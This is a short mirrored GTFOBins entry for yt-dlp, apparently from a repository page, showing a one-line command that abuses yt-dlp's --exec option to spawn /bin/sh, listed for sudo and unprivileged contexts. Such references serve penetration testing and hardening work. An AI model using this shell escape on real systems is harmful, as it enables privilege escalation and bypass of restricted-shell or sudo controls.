1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2026-03-07 14:36:23 +01:00
GTFOBins.github.io/_gtfobins/yt-dlp
2026-01-30 14:02:26 +01:00

12 lines
266 B
Plaintext

---
functions:
shell:
- code: |-
yt-dlp 'https://www.youtube.com/watch?v=xxxxxxxxxxx' --exec '/bin/sh #'
comment: |-
The URL must point to a valid YouTube video which will be actually downloaded.
contexts:
sudo:
unprivileged:
...